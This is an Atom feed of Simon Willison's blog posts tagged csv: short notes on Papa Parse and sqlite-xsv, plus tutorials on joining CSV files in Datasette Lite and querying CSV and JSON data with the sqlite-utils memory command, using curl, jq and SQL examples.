<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: csv</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/csv.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2024-03-20T00:53:29+00:00</updated><author><name>Simon Willison</name></author><entry><title>Papa Parse</title><link href="https://simonwillison.net/2024/Mar/20/papa-parse/#atom-tag" rel="alternate"/><published>2024-03-20T00:53:29+00:00</published><updated>2024-03-20T00:53:29+00:00</updated><id>https://simonwillison.net/2024/Mar/20/papa-parse/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.papaparse.com/"&gt;Papa Parse&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I’ve been trying out this JavaScript library for parsing CSV and TSV data today and I’m very impressed. It’s extremely fast, has all of the advanced features I want (streaming support, optional web workers, automatically detecting delimiters and column types), has zero dependencies and weighs just 19KB minified—6.8KB gzipped.&lt;/p&gt;

&lt;p&gt;The project is 11 years old now. It was created by Matt Holt, who later went on to create the Caddy web server. Today it’s maintained by Sergi Almacellas Abellana.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://github.com/mholt/PapaParse"&gt;mholt/PapaParse&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/matt-holt"&gt;matt-holt&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="javascript"/><category term="matt-holt"/></entry><entry><title>Introducing sqlite-xsv: The Fastest CSV Parser for SQLite</title><link href="https://simonwillison.net/2023/Jan/14/sqlite-xsv/#atom-tag" rel="alternate"/><published>2023-01-14T21:54:05+00:00</published><updated>2023-01-14T21:54:05+00:00</updated><id>https://simonwillison.net/2023/Jan/14/sqlite-xsv/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://observablehq.com/@asg017/introducing-sqlite-xsv"&gt;Introducing sqlite-xsv: The Fastest CSV Parser for SQLite&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Alex Garcia continues to push the boundaries of SQLite extensions. This new extension in Rust wraps the lightning fast Rust csv crate and provides a new csv_reader() virtual table that can handle regular, gzipped and zstd compressed files.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rust"&gt;rust&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/alex-garcia"&gt;alex-garcia&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/zstd"&gt;zstd&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="sqlite"/><category term="rust"/><category term="alex-garcia"/><category term="zstd"/></entry><entry><title>Joining CSV files in your browser using Datasette Lite</title><link href="https://simonwillison.net/2022/Jun/20/datasette-lite-csvs/#atom-tag" rel="alternate"/><published>2022-06-20T21:20:16+00:00</published><updated>2022-06-20T21:20:16+00:00</updated><id>https://simonwillison.net/2022/Jun/20/datasette-lite-csvs/#atom-tag</id><summary type="html">
    &lt;p&gt;I added a new feature to &lt;a href="https://lite.datasette.io/"&gt;Datasette Lite&lt;/a&gt; - my version of &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt; that runs entirely in your browser using WebAssembly (&lt;a href="https://simonwillison.net/2022/May/4/datasette-lite/"&gt;previously&lt;/a&gt;): you can now use it to load one or more CSV files by URL, and then run SQL queries against them - including joins across data from multiple files.&lt;/p&gt;
&lt;p&gt;Your CSV file needs to be hosted somewhere with &lt;code&gt;access-control-allow-origin: *&lt;/code&gt; CORS headers. Any CSV file hosted on GitHub provides these, if you use the link you get by clicking on the "Raw" version.&lt;/p&gt;
&lt;h4&gt;Loading CSV data from a URL&lt;/h4&gt;
&lt;p&gt;Here's the URL to a CSV file of college fight songs collected by FiveThirtyEight &lt;a href="https://github.com/fivethirtyeight/data/tree/master/fight-songs"&gt;in their data repo&lt;/a&gt; as part of the reporting for &lt;a href="https://projects.fivethirtyeight.com/college-fight-song-lyrics/"&gt;this story&lt;/a&gt; a few years ago:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv"&gt;https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;You can pass this to Datasette Lite in two ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;You can &lt;a href="https://lite.datasette.io/"&gt;load the web app&lt;/a&gt;, click the "Load data by URL to a CSV file" button and paste in the URL&lt;/li&gt;
&lt;li&gt;Or you can pass it as a &lt;code&gt;?csv=&lt;/code&gt; parameter to the application, like this: &lt;a href="https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv"&gt;https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Once Datasette has loaded, a &lt;code&gt;data&lt;/code&gt; database will be available with a single table called &lt;code&gt;fight-songs&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;As you navigate around in Datasette the URL bar will update to reflect current state - which means you can deep-link to table views with applied filters and facets:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data/fight-songs?_facet=conference&amp;amp;_facet=student_writer&amp;amp;_facet=official_song"&gt;https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data/fight-songs?_facet=conference&amp;amp;_facet=student_writer&amp;amp;_facet=official_song&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Or even link to the result of a custom SQL query:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data?sql=select+school%2C+conference%2C+song_name%2C+writers%2C+year%2C+student_writer+spotify_id+from+%5Bfight-songs%5D+order+by+rowid+limit+101"&gt;https://lite.datasette.io/?csv=https://raw.githubusercontent.com/fivethirtyeight/data/master/fight-songs/fight-songs.csv#/data?sql=select+school%2C+conference%2C+song_name%2C+writers%2C+year%2C+student_writer+spotify_id+from+%5Bfight-songs%5D+order+by+rowid+limit+101&lt;/a&gt;&lt;/p&gt;
&lt;h4&gt;Loading multiple files and joining data&lt;/h4&gt;
&lt;p&gt;You can pass the &lt;code&gt;?csv=&lt;/code&gt; parameter more than once to load data from multiple CSV files into the same virtual &lt;code&gt;data&lt;/code&gt; database. Each CSV file will result in a separate table.&lt;/p&gt;
&lt;p&gt;For this demo I'll use two CSV files.&lt;/p&gt;
&lt;p&gt;The first is &lt;a href="https://github.com/nytimes/covid-19-data/blob/master/us-counties-recent.csv"&gt;us-counties-recent.csv&lt;/a&gt; from the NY Times &lt;a href="https://github.com/nytimes/covid-19-data"&gt;covid-19-data&lt;/a&gt; repository, which lists the most recent numbers for Covid cases for every US county.&lt;/p&gt;
&lt;p&gt;The second is &lt;a href="https://github.com/simonw/covid-19-datasette/blob/main/us_census_county_populations_2019.csv"&gt;us_census_county_populations_2019.csv&lt;/a&gt;, a CSV file listing the population of each county according to the 2019 US Census which I extracted from &lt;a href="https://www.census.gov/data/datasets/time-series/demo/popest/2010s-state-total.html"&gt;this page&lt;/a&gt; on the US Census website.&lt;/p&gt;
&lt;p&gt;Both of those tables include a column called &lt;code&gt;fips&lt;/code&gt;, representing the &lt;a href="https://en.wikipedia.org/wiki/FIPS_county_code"&gt;FIPS county code&lt;/a&gt; for each county. These 4-5 digit codes are ideal for joining the two tables.&lt;/p&gt;
&lt;p&gt;Here's a SQL query which joins the two tables, filters for the data for the most recent date represented (using &lt;code&gt;where date = (select max(date) from [us-counties-recent])&lt;/code&gt;) and calculates &lt;code&gt;cases_per_million&lt;/code&gt; using the cases and the population:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt;
  [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent].&lt;span class="pl-k"&gt;*&lt;/span&gt;,
  &lt;span class="pl-c1"&gt;us_census_county_populations_2019&lt;/span&gt;.&lt;span class="pl-c1"&gt;population&lt;/span&gt;,
  &lt;span class="pl-c1"&gt;1&lt;/span&gt;.&lt;span class="pl-c1"&gt;0&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent].cases &lt;span class="pl-k"&gt;/&lt;/span&gt; &lt;span class="pl-c1"&gt;us_census_county_populations_2019&lt;/span&gt;.&lt;span class="pl-c1"&gt;population&lt;/span&gt; &lt;span class="pl-k"&gt;*&lt;/span&gt; &lt;span class="pl-c1"&gt;1000000&lt;/span&gt; &lt;span class="pl-k"&gt;as&lt;/span&gt; cases_per_million
&lt;span class="pl-k"&gt;from&lt;/span&gt;
  [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent]
  &lt;span class="pl-k"&gt;join&lt;/span&gt; us_census_county_populations_2019 &lt;span class="pl-k"&gt;on&lt;/span&gt; &lt;span class="pl-c1"&gt;us_census_county_populations_2019&lt;/span&gt;.&lt;span class="pl-c1"&gt;fips&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent].fips
&lt;span class="pl-k"&gt;where&lt;/span&gt;
  &lt;span class="pl-k"&gt;date&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; (&lt;span class="pl-k"&gt;select&lt;/span&gt; &lt;span class="pl-c1"&gt;max&lt;/span&gt;(&lt;span class="pl-k"&gt;date&lt;/span&gt;) &lt;span class="pl-k"&gt;from&lt;/span&gt; [us&lt;span class="pl-k"&gt;-&lt;/span&gt;counties&lt;span class="pl-k"&gt;-&lt;/span&gt;recent])
&lt;span class="pl-k"&gt;order by&lt;/span&gt;
  cases_per_million &lt;span class="pl-k"&gt;desc&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2022/datasette-lite-csv-join.png" alt="A screenshot of that query running in Datasette. Loving county Texas has the worst result - 1,289,940 cases per million - but that's because they have a population of just 169 people and 218 recorded cases." style="max-width:100%;" /&gt;&lt;/p&gt;
&lt;p&gt;And since everything in Datasette Lite can be bookmarked, here's the super long URL (&lt;a href="https://lite.datasette.io/?csv=https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties-recent.csv&amp;amp;csv=https://raw.githubusercontent.com/simonw/covid-19-datasette/main/us_census_county_populations_2019.csv#/data?sql=select%0A++%5Bus-counties-recent%5D.*%2C%0A++us_census_county_populations_2019.population%2C%0A++1.0+*+%5Bus-counties-recent%5D.cases+%2F+us_census_county_populations_2019.population+*+1000000+as+cases_per_million%0Afrom%0A++%5Bus-counties-recent%5D%0A++join+us_census_county_populations_2019+on+us_census_county_populations_2019.fips+%3D+%5Bus-counties-recent%5D.fips%0Awhere%0A++date+%3D+%28select+max%28date%29+from+%5Bus-counties-recent%5D%29%0Aorder+by%0A++cases_per_million+desc"&gt;clickable version here&lt;/a&gt;) that executes that query against those two CSV files:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;https://lite.datasette.io/?csv=https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties-recent.csv&amp;amp;csv=https://raw.githubusercontent.com/simonw/covid-19-datasette/main/us_census_county_populations_2019.csv#/data?sql=select%0A++%5Bus-counties-recent%5D.*%2C%0A++us_census_county_populations_2019.population%2C%0A++1.0+*+%5Bus-counties-recent%5D.cases+%2F+us_census_county_populations_2019.population+*+1000000+as+cases_per_million%0Afrom%0A++%5Bus-counties-recent%5D%0A++join+us_census_county_populations_2019+on+us_census_county_populations_2019.fips+%3D+%5Bus-counties-recent%5D.fips%0Awhere%0A++date+%3D+%28select+max%28date%29+from+%5Bus-counties-recent%5D%29%0Aorder+by%0A++cases_per_million+desc&lt;/code&gt;&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sql"&gt;sql&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webassembly"&gt;webassembly&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette-lite"&gt;datasette-lite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cors"&gt;cors&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="projects"/><category term="sql"/><category term="datasette"/><category term="webassembly"/><category term="datasette-lite"/><category term="cors"/></entry><entry><title>Joining CSV and JSON data with an in-memory SQLite database</title><link href="https://simonwillison.net/2021/Jun/19/sqlite-utils-memory/#atom-tag" rel="alternate"/><published>2021-06-19T22:55:57+00:00</published><updated>2021-06-19T22:55:57+00:00</updated><id>https://simonwillison.net/2021/Jun/19/sqlite-utils-memory/#atom-tag</id><summary type="html">
    &lt;p&gt;The new &lt;code&gt;sqlite-utils memory&lt;/code&gt; command can import CSV and JSON data directly into an in-memory SQLite database, combine and query it using SQL and output the results as CSV, JSON or various other formats of plain text tables.&lt;/p&gt;
&lt;h4&gt;sqlite-utils memory&lt;/h4&gt;
&lt;p&gt;The new feature is part of &lt;a href="https://sqlite-utils.datasette.io/en/latest/changelog.html#v3-10"&gt;sqlite-utils 3.10&lt;/a&gt;, which I released this morning. You can install it using &lt;code&gt;brew install sqlite-utils&lt;/code&gt; or &lt;code&gt;pip install sqlite-utils&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I've recorded &lt;a href="https://www.youtube.com/watch?v=OUjd0rkc678"&gt;this video&lt;/a&gt; demonstrating the new feature - with full accompanying notes below.&lt;/p&gt;

&lt;iframe style="max-width: 100%" width="560" height="315" src="https://www.youtube-nocookie.com/embed/OUjd0rkc678" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="allowfullscreen"&gt; &lt;/iframe&gt;

&lt;p&gt;&lt;code&gt;sqlite-utils&lt;/code&gt; already offers a mechanism for importing CSV and JSON data into a SQLite database file, in the form of the &lt;a href="https://sqlite-utils.datasette.io/en/stable/cli.html#cli-inserting-data"&gt;sqlite-utils insert&lt;/a&gt; command. Processing data with this involves two steps: first import it into a &lt;code&gt;temp.db&lt;/code&gt; file, then use &lt;a href="https://sqlite-utils.datasette.io/en/stable/cli.html#running-sql-queries"&gt;sqlite-utils query&lt;/a&gt; to run queries and output the results.&lt;/p&gt;
&lt;p&gt;Using SQL to re-shape data is really useful - since &lt;code&gt;sqlite-utils&lt;/code&gt; can output in multiple different formats, I frequently find myself loading in a CSV file and exporting it back out as JSON, or vice-versa.&lt;/p&gt;
&lt;p&gt;This week I realized that I had most of the pieces in place to reduce this to a single step. The new &lt;code&gt;sqlite-utils memory&lt;/code&gt; command (&lt;a href="https://sqlite-utils.datasette.io/en/stable/cli.html#cli-memory"&gt;full documentation here&lt;/a&gt;) operates against a temporary, in-memory SQLite database. It can import data, execute SQL and output the result in a one-liner, without needing any temporary database files along the way.&lt;/p&gt;
&lt;p&gt;Here's an example. My &lt;a href="https://github.com/dogsheep"&gt;Dogsheep&lt;/a&gt; GitHub organization has a number of repositories. GitHub make those available via an authentication-optional API endpoint at &lt;a href="https://api.github.com/users/dogsheep/repos"&gt;https://api.github.com/users/dogsheep/repos&lt;/a&gt; - which returns JSON that looks like this (simplified):&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;[
  {
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;id&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;197431109&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;name&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;dogsheep-beta&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;full_name&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;dogsheep/dogsheep-beta&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;size&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;61&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;stargazers_count&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;79&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;watchers_count&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;79&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;forks&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;0&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;open_issues&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;11&lt;/span&gt;
  },
  {
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;id&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;256834907&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;name&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;dogsheep-photos&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;full_name&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;dogsheep/dogsheep-photos&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;size&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;64&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;stargazers_count&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;116&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;watchers_count&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;116&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;forks&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;5&lt;/span&gt;,
    &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;open_issues&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;18&lt;/span&gt;
  }
]&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;With &lt;code&gt;sqlite-utils memory&lt;/code&gt; we can see the 3 most popular repos by number of stars like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' -t
full_name                     forks_count    stars
--------------------------  -------------  -------
dogsheep/twitter-to-sqlite             12      225
dogsheep/github-to-sqlite              14      139
dogsheep/dogsheep-photos                5      116
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We're using &lt;code&gt;curl&lt;/code&gt; to fetch the JSON and pipe it into &lt;code&gt;sqlite-utils memory&lt;/code&gt; - the &lt;code&gt;-&lt;/code&gt; means "read from standard input". Then we pass the following SQL query:&lt;/p&gt;
&lt;div class="highlight highlight-source-sql"&gt;&lt;pre&gt;&lt;span class="pl-k"&gt;select&lt;/span&gt; full_name, forks_count, stargazers_count &lt;span class="pl-k"&gt;as&lt;/span&gt; stars
&lt;span class="pl-k"&gt;from&lt;/span&gt; stdin &lt;span class="pl-k"&gt;order by&lt;/span&gt; stars &lt;span class="pl-k"&gt;desc&lt;/span&gt; &lt;span class="pl-k"&gt;limit&lt;/span&gt; &lt;span class="pl-c1"&gt;3&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;stdin&lt;/code&gt; is the temporary table created for the data piped in to the tool. The query selects three of the JSON properties, renames &lt;code&gt;stargazers_count&lt;/code&gt; to &lt;code&gt;stars&lt;/code&gt;, sorts by stars and return the first three.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;-t&lt;/code&gt; option here means "output as a formatted table" - without that option we get JSON:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    '  
[{"full_name": "dogsheep/twitter-to-sqlite", "forks_count": 12, "stars": 225},
 {"full_name": "dogsheep/github-to-sqlite", "forks_count": 14, "stars": 139},
 {"full_name": "dogsheep/dogsheep-photos", "forks_count": 5, "stars": 116}]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Or we can use &lt;code&gt;--csv&lt;/code&gt; to get back CSV:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' --csv
full_name,forks_count,stars
dogsheep/twitter-to-sqlite,12,225
dogsheep/github-to-sqlite,14,139
dogsheep/dogsheep-photos,5,116
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;-t&lt;/code&gt; option supports a number of different formats, specified using &lt;code&gt;--fmt&lt;/code&gt;. If I wanted to generate a LaTeX table of the top repos by stars I could do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
  | sqlite-utils memory - '
      select full_name, forks_count, stargazers_count as stars
      from stdin order by stars desc limit 3
    ' -t --fmt=latex
\begin{tabular}{lrr}
\hline
 full\_name                  &amp;amp;   forks\_count &amp;amp;   stars \\
\hline
 dogsheep/twitter-to-sqlite &amp;amp;            12 &amp;amp;     225 \\
 dogsheep/github-to-sqlite  &amp;amp;            14 &amp;amp;     139 \\
 dogsheep/dogsheep-photos   &amp;amp;             5 &amp;amp;     116 \\
\hline
\end{tabular}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can run aggregate queries too - let's add up the total size and total number of stars across all of those repositories:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl -s 'https://api.github.com/users/dogsheep/repos' \
| sqlite-utils memory - '
    select sum(size), sum(stargazers_count) from stdin
' -t
  sum(size)    sum(stargazers_count)
-----------  -----------------------
        843                      934
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(I believe size here is measured in kilobytes: the GitHub API documentation isn't clear on this point.)&lt;/p&gt;
&lt;h4 id="joining-across-different-files"&gt;Joining across different files&lt;/h4&gt;
&lt;p&gt;All of these examples have worked with JSON data piped into the tool - but you can also pass one or more files, of different formats, in a way that lets you execute joins against them.&lt;/p&gt;
&lt;p&gt;As an example, let's combine two sources of data.&lt;/p&gt;
&lt;p&gt;The New York Times publish a &lt;a href="https://github.com/nytimes/covid-19-data/blob/master/us-states.csv"&gt;us-states.csv&lt;/a&gt; file with Covid cases and deaths by state over time.&lt;/p&gt;
&lt;p&gt;The CDC have an &lt;a href="https://covid.cdc.gov/covid-data-tracker/COVIDData/getAjaxData?id=vaccination_data"&gt;undocumented JSON endpoint&lt;/a&gt; (which I've been &lt;a href="https://github.com/simonw/cdc-vaccination-history"&gt;archiving here&lt;/a&gt;) tracking the progress of vaccination across different states.&lt;/p&gt;
&lt;p&gt;We're going to run a join from that CSV data to that JSON data, and output a table of results.&lt;/p&gt;
&lt;p&gt;First, we need to download the files. The &lt;a href="https://covid.cdc.gov/covid-data-tracker/COVIDData/getAjaxData?id=vaccination_data"&gt;CDC JSON data&lt;/a&gt; isn't quite in the right shape for our purposes:&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;{
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;runid&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-c1"&gt;2023&lt;/span&gt;,
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;vaccination_data&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: [
    {
      &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Date&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;2021-06-19&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Location&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;US&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;ShortName&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;USA&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
      &lt;span class="pl-s"&gt;...&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;sqlite-utils&lt;/code&gt; expects a flat JSON array of objects - we can use &lt;a href="https://stedolan.github.io/jq/"&gt;jq&lt;/a&gt; to re-shape the data like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ curl https://covid.cdc.gov/covid-data-tracker/COVIDData/getAjaxData?id=vaccination_data \
  | jq .vaccination_data &amp;gt; vaccination_data.json
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The New York Times data is good as is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ wget 'https://github.com/nytimes/covid-19-data/raw/master/us-states.csv'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now that we have the data locally, we can run a join to combine it using the following command:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ sqlite-utils memory us-states.csv vaccination_data.json "
  select
    max(t1.date),
    t1.state,
    t1.cases,
    t1.deaths,
    t2.Census2019,
    t2.Dist_Per_100K
  from
    t1
      join t2 on t1.state = replace(t2.LongName, 'New York State', 'New York')
  group by
    t1.state
  order by
    Dist_Per_100K desc
" -t
max(t1.date)    state                       cases    deaths    Census2019    Dist_Per_100K
--------------  ------------------------  -------  --------  ------------  ---------------
2021-06-18      District of Columbia        49243      1141        705749           149248
2021-06-18      Vermont                     24360       256        623989           146257
2021-06-18      Rhode Island               152383      2724       1059361           141291
2021-06-18      Massachusetts              709263     17960       6892503           139692
2021-06-18      Maryland                   461852      9703       6045680           138193
2021-06-18      Maine                       68753       854       1344212           136894
2021-06-18      Hawaii                      35903       507       1415872           136024
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm using automatically created numeric aliases &lt;code&gt;t1&lt;/code&gt; and &lt;code&gt;t2&lt;/code&gt; for the files here, but I can also use their full table names &lt;code&gt;"us-states"&lt;/code&gt; (quotes needed due to the hyphen) and &lt;code&gt;vaccination_data&lt;/code&gt; instead.&lt;/p&gt;
